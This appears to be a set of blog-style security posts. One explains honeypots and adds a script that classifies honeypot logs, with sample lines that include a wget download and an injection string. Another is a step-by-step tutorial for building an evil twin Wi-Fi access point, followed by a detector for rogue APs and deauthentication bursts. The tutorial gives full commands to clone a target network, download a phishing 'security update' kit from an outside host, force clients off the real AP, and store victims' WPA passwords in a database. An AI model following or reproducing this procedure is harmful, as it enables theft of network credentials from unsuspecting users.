How can we Define a Honeypot?


How can we define honeypots?

A honeypot is essentially a computer system: it contains files and directories just like any other computer system. Its aim is to attract an attacker into its trap so that his actions can be investigated and his behavior followed. In fact, a honeypot is not a real system; it is a fake one. The difference between a honeypot and other security systems lies in the fact that a variety of security problems can be tackled at once using the diverse approaches a honeypot makes available, whereas other usual security systems tackle one particular problem through one proposed solution. A simple instance of this point is the scenario in which a compromised system is investigated after a log of the malicious activity has been obtained. At the same time, new threats can be recognized by implementing a honeypot in a network, and hence an attempt can be made to tackle these problems and overcome them effectively.


To an outside attacker, honeypots are indistinguishable from the actual production servers, so he will not behave any differently when attacking them. The network security team, however, can monitor the honeypots for recorded attacks and analyze them later. Honeypots can also help absorb attacks directed against the real server.


What is the motivation behind a honeypot?

The honeypot idea is mainly derived from a keen interest in the field of computer security. Implementing a honeypot requires an interest in the workflow of security systems and solid knowledge of how a company can be protected and of how security flaws in a system can be very risky for the entire system and organization. A network administrator should be ready for a great deal of work when implementing a honeypot in a network. Being aware of the system and network architecture, and of the modifications that could be applied to them, is a crucial step beforehand. The output is then examined with reliable forensic tools. Along the way, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot into the system. Facing such problems beforehand is very important for the administrator: it ensures that later, even if conditions are intense, the system can be handled quickly and losses easily recovered. Therefore, good knowledge of examining security problems and of forensic science is a must.


What should be done before applying a honeypot to the real production system?

A network administrator should carry out some research as soon as he considers applying the honeypot concept to the network. He has to be sure that the created honeypot is secured so that it has no leaks into the actual system; otherwise, it will cause a real disaster. He also has to make sure that a hacker cannot tell that he has been trapped in a honeypot, and he has to know the maximum amount of information an attacker can obtain through the honeypot implementation. It is also useful to know how an attacker behaves once he knows he is in a trap: will he simply give up hacking and stop his actions? Finally, it is really important for a network administrator to know where in the network the honeypot should be deployed and how much information he can get from it.

Laws play a role in everything. A network administrator should therefore be aware of the restrictions on implementing honeypots, especially if his organization is in the European Union (EU) or the United States of America (USA). Certain rules and regulations govern the process of obtaining information about an attacker or tracking him back. A network administrator should abide by these rules by not fully tracking the attacker, and at the same time he should be respectful of the law in every way.

What is the description of our problem?

When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control of the intentional flaws left there. When we trace the hacker, it is not guaranteed that we will be the ones in control. Thus, we do not know that much about the security of a honeypot. We are not sure whether the attacker actually knows it is a fake system, and we doubt whether he is aware of the great importance of the information he acquires about the system's flaws. We need to be very specific and certain about the actual limits an attacker has once he gains control over the honeypot system. It will be disappointing if the attacker can exploit the honeypot itself, seizing a flaw in it to reach the real system and do what he wants there; the entire system is compromised when an attacker reaches this devastating point. Another problem is that an attacker may recognize that it is a trap and then stop hacking, or only pretend to keep hacking. At that point, the installed honeypot is no longer beneficial, and it is not useful either to investigate the system with our forensics tools. A very important aspect of using honeypots is to be sure about the answers to all these questions, to try to make our honeypots more secure, and to be assured that an attacker hacking the honeypot will not obtain any useful data about the actual system. A good network administrator should play the role of a hacker on one occasion and of a forensic examiner on another, or do both simultaneously with his own team. Very accurate results can be obtained depending on the various tools used for hacking and forensics.


What are the Types of Honeypots?


A honeypot is essentially a computer system: it contains files and directories like any other computer system. It aims to attract an attacker into its trap in order to investigate his actions and follow his behavior. In fact, a honeypot is not an actual system but an intentionally built fake one.

What are the types of honeypots?

Looking at the aims of honeypots and their levels of interaction, we can group them into two main types: research honeypots and production honeypots.

  1. Research honeypots:

Military, research and government organizations mainly depend on this type of honeypot. A huge amount of data is collected by such honeypots; new threats and Blackhat motives can easily be recognized through them. While the main benefit of research honeypots is understanding how a system could become more secure, they cannot give any valuable data about increasing the security of an organization and its vulnerabilities.

  2. Production honeypots:

These honeypots are mainly used to make an organization better protected against potential attacks. They are implemented mainly inside the organization’s production network itself, and their aim, at the end of the day, is to increase the organization's overall security.

A limited amount of data is captured through such honeypots, since low-interaction honeypots are used. In this process, the behavior of an attacker is monitored very carefully with the proper forensic tools, so that possible risks are lowered and the organization consequently becomes more secure. These are the honeypots most used in practice, yet at times they may themselves represent a risk for the organization.

What matters most about this type of honeypot is where and how network administrators implement it. Remember that honeypots are implemented within a real network and system, and testing them usually yields several unexpected actions or problems.

Consequently, other systems inside the organization may be endangered when these honeypots are implemented in the network. An administrator should be fully aware that other systems could be misused through the honeypots, and should therefore make sure that all other systems inside the organization are secured enough once the honeypot's features are deployed. Otherwise, the entire organization will eventually face a serious problem.

How to categorize honeypots according to the type of data collection?

Honeypots can also be classified by the type of data they collect about a given attack. A honeypot can be set up to detect and record one or more types of data: events (things that happen which change something in the honeypot), attacks (attempts by a malicious user to exploit a vulnerability), and intrusions (successful attacks that penetrate the honeypot). There is no judgment that one type of data is more important than another; most honeypots can display some information from each of these categories. In fact, all of these categories are really important for a security administrator to understand an attack and know a system's vulnerabilities.
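The three data categories can be applied directly to what a honeypot logs. The following Python script, an added example rather than code from the original post, parses a constructed honeypot log and labels each record as an event, an attack or an intrusion; it goes slightly beyond the text by also reporting the highest category each source address reached. The log format, the record kinds and the HTTP attack pattern are assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample log, not captured from a real honeypot.
# Assumed format: "<timestamp> <source-ip> <kind> [detail]".
SAMPLE_LOG = """\
2024-01-05T10:00:01Z 203.0.113.7 CONNECT service=ssh
2024-01-05T10:00:02Z 203.0.113.7 LOGIN_FAIL user=root
2024-01-05T10:00:03Z 203.0.113.7 LOGIN_FAIL user=admin
2024-01-05T10:00:05Z 203.0.113.7 LOGIN_OK user=admin
2024-01-05T10:00:06Z 203.0.113.7 CMD wget http://example.invalid/x.sh
2024-01-05T10:00:07Z 203.0.113.7 FILE_WRITE /tmp/x.sh
2024-01-05T10:02:00Z 198.51.100.9 CONNECT service=http
2024-01-05T10:02:01Z 198.51.100.9 HTTP GET /index.php?id=1'%20OR%201=1
2024-01-05T10:02:02Z 198.51.100.9 DISCONNECT
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)(?: (.*))?$")

# Record kinds (assumed names) mapped to the page's categories. Anything not
# listed is a plain event: it changed something in the honeypot (a connection,
# a disconnection) without being an exploitation attempt.
ATTACK_KINDS = {"LOGIN_FAIL"}                        # attempts to exploit
INTRUSION_KINDS = {"LOGIN_OK", "CMD", "FILE_WRITE"}  # attacker got inside
# Crude pattern for exploit attempts inside HTTP requests (illustrative only).
HTTP_ATTACK_RE = re.compile(r"('|%27|\.\./|%2e%2e|<script)", re.IGNORECASE)

RANK = {"event": 0, "attack": 1, "intrusion": 2}


@dataclass
class Record:
    ts: str
    src: str
    kind: str
    detail: str


def parse_log(text):
    """Parse the assumed one-record-per-line format into Record objects."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"malformed log line: {line!r}")
        ts, src, kind, detail = m.groups()
        records.append(Record(ts, src, kind, detail or ""))
    return records


def classify_record(rec):
    """Label one record as 'event', 'attack' or 'intrusion'."""
    if rec.kind in INTRUSION_KINDS:
        return "intrusion"
    if rec.kind in ATTACK_KINDS:
        return "attack"
    if rec.kind == "HTTP" and HTTP_ATTACK_RE.search(rec.detail):
        return "attack"
    return "event"


def classify_sources(records):
    """Return (highest category per source IP, number of records per category)."""
    per_source = {}
    counts = Counter()
    for rec in records:
        cat = classify_record(rec)
        counts[cat] += 1
        current = per_source.get(rec.src, "event")
        if RANK[cat] >= RANK[current]:
            per_source[rec.src] = cat
    return per_source, counts


if __name__ == "__main__":
    per_source, counts = classify_sources(parse_log(SAMPLE_LOG))
    for src, cat in per_source.items():
        print(f"{src}: highest category reached = {cat}")
    print("records per category:", dict(counts))
```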


Is the usage of honeypots considered legal or not?

There are some legal issues of which one should be fully aware when deploying a honeypot inside an organization's network. Such legal issues vary according to the governing rules and the country where the honeypot is deployed and configured. The regulations cover many different aspects, but mainly three: the security of data, data collection, and the way honeypots are used in an organization.

These laws rely heavily on the quality of the data captured by a honeypot and on the person implementing and deploying the honeypot inside the network in the first place. The most significant issue in legalizing the use of honeypots is the type and content of the collected data. This makes it harder to determine whether using honeypots is legal, because legality depends mainly on what the data is intended to be used for after it is collected. This leaves several steps that one should carefully consider when deploying a honeypot inside the network.

Many questions should also be asked during the experiment. Things are no different when using a honeypot for a company or at home, yet for a company there are several other responsibilities that a network administrator should consider and take great care of. A network administrator is responsible for complying with the country's laws first and the company's rules next.

It is a must to abide by these laws to remain in legal standing. While some companies allow almost any experiment inside the company, many others place several restrictions on such experiments. Before a honeypot is deployed, one has to be sure about the legality of honeypots within the company and the country, and has to ask the responsible persons to make sure that what he is doing does not violate the current rules set by either the country or, of course, the company. In this regard, there are three main legal issues to consider when using honeypots: privacy, entrapment and civil liability.



How can you Create an Evil Twin Access Point?


Quick intro to Evil Twin:

What is an evil twin access point? When it comes to security, and Wi-Fi security in particular, the term evil twin access point comes up often. Basically, an attacker imitates a real Wi-Fi access point in order to collect data from whoever attempts to access the network.

Installing a Wi-Fi access point with the same name and settings as another access point, and positioning it next to the impersonated one, will most likely cause the victim to fall into the trap. Since the two access points become twins, identical twins so to speak, the user can hardly distinguish between them and will try to connect to the evil access point as if it were the original. This is because the signal strengths may be similar, or at times the evil access point may even have the stronger signal.

There are two cases: either the user’s device connects automatically to an access point, which in this case is the evil one, or the user manually chooses the stronger access point, perceiving it as the nearer one. In both cases, all the user’s sensitive data, such as passwords, is intercepted by the attacker.

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps are a concise way to prepare an evil twin access point for an attack:

  1. Open your Kali Linux machine and log in.
  2. Establish the Internet connection between your machine and the host machine.
  3. Install a DHCP server on your machine. This can be done by opening the terminal and typing: apt-get install dhcp3-server
  4. After the installation completes successfully, configure the DHCP server with the following command:

nano /etc/dhcpd.conf

A blank file should open in the terminal right after executing this command.

  5. Inside the blank file, type the following lines exactly as they are:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8;
range 192.168.1.130 192.168.1.140;
}

  6. Save the file by pressing Ctrl+X and then pressing ‘y’.
  7. Next, download the security update page; this is the page that will appear when the user opens a browser. To do so, change the directory to /var/www with the following command:

cd /var/www

  8. Now that you have changed the working directory, type the following commands in order:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  9. Start the Apache server and MySQL as well. The following commands, respectively, do this:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  10. Create a database to store the users’ WPA/WPA2 passwords when they enter them on the security update page. The following commands do this:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Don’t close the MySQL page or terminal after this step.

  11. Find the interface name of the local network adapter and the local IP as well. To do that, open a new separate terminal and type the following commands in it:

ip route

airmon-ng

airmon-ng start wlan0

clear

When you type the first command of this list, take note of the local IP on the wired interface: the interface name is the one shown as “eth0”, and the local IP appears after “src”.

  12. Type the following commands now:

airodump-ng-oui-update

airodump-ng -M mon0 (take note of the target ESSID, BSSID and channel number, which all appear after this command)

airbase-ng -e [ESSID] -c [ch. #] -P mon0 (where [ESSID] is your target’s ESSID and [ch. #] is the target’s channel number, which you took note of after the previous command)

  13. Now the evil access point is running. However, we still need to configure our tunnel interface to bridge the evil twin access point and the wired interface. The tunnel interface is named at0; it was created when we ran airbase-ng in the previous step. Open a new separate terminal, without closing the MySQL or airbase terminals, and type the following command into it:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  14. A route has to be added now and IP forwarding enabled so that traffic can flow into and out of our evil access point. Type the following commands in order:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [LOCAL IP ADDRESS]:80

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

  15. Perform a de-authentication attack now. This forces all connected clients to reconnect, this time to the evil twin access point. First, create a blacklist file containing the target’s BSSID. The following commands do this:

echo [BSSID] > blacklist

NOTE: [BSSID] is the BSSID of the target.

mdk3 mon0 d -b blacklist -c [CH.#]

  16. Go back to the airbase terminal; there you will see whether a user has connected to the evil twin access point. By then he will have entered his WPA/WPA2 password. To view it, go back to the MySQL terminal and type the following commands:

use evil_twin

select * from wpa_keys; (shows the password entered by the victim in our MySQL database)

  17. Congratulations! You have created the evil twin access point successfully.
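From the defender's side, the procedure above leaves two observable traces: a beacon advertising the target ESSID from a BSSID that is not one of the organization's own access points (the airbase-ng step), and a burst of de-authentication frames aimed at one BSSID (the mdk3 step). The following Python script, an added example rather than code from the original post, flags both in constructed frame summaries such as a wireless sensor might report; the inventory, the frame layout and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed inventory of the organization's own access points (assumption):
# ESSID -> set of authorized BSSIDs.
AUTHORIZED = {
    "CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
}

# Constructed frame summaries (assumed layout):
# (time_s, type, essid, bssid, channel, rssi_dbm), type is "beacon" or "deauth".
# For deauth frames the ESSID is None and bssid is the AP address the frame
# claims to come from.
FRAMES = [
    (0.0, "beacon", "CorpWiFi", "aa:bb:cc:00:00:01", 6, -60),
    (0.1, "beacon", "CorpWiFi", "aa:bb:cc:00:00:02", 11, -70),
    (0.2, "beacon", "CorpWiFi", "de:ad:be:ef:00:01", 6, -35),  # twin: same name, stronger
    (0.3, "beacon", "GuestNet", "aa:bb:cc:00:00:09", 1, -65),  # ESSID not managed here
] + [
    # 60 deauth frames within 0.6 s, spoofing the real AP's address
    (1.0 + i * 0.01, "deauth", None, "aa:bb:cc:00:00:01", 6, -40) for i in range(60)
]


def find_rogue_twins(frames, authorized):
    """Beacons that advertise a managed ESSID from a BSSID not in the inventory.

    Returns {bssid: (essid, channel, rssi_dbm)}. The RSSI is reported because
    a twin placed close to the victims typically shows the stronger signal.
    """
    rogues = {}
    for _, ftype, essid, bssid, channel, rssi in frames:
        if ftype != "beacon" or essid not in authorized:
            continue
        if bssid.lower() not in authorized[essid]:
            rogues[bssid.lower()] = (essid, channel, rssi)
    return rogues


def find_deauth_bursts(frames, window_s=1.0, threshold=20):
    """Sources whose deauth frames reach `threshold` within any `window_s` window.

    Returns {bssid: peak_count}. Normal roaming produces isolated deauths; a
    flood against one BSSID is the signature of clients being forced off it.
    """
    by_src = defaultdict(list)
    for t, ftype, _, bssid, _, _ in frames:
        if ftype == "deauth":
            by_src[bssid.lower()].append(t)
    bursts = {}
    for bssid, times in by_src.items():
        times.sort()
        start = peak = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[bssid] = peak
    return bursts


if __name__ == "__main__":
    for bssid, (essid, ch, rssi) in find_rogue_twins(FRAMES, AUTHORIZED).items():
        print(f"ROGUE AP {bssid} advertising {essid!r} on channel {ch} at {rssi} dBm")
    for bssid, n in find_deauth_bursts(FRAMES).items():
        print(f"DEAUTH BURST from {bssid}: {n} frames in a 1 s window")
```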
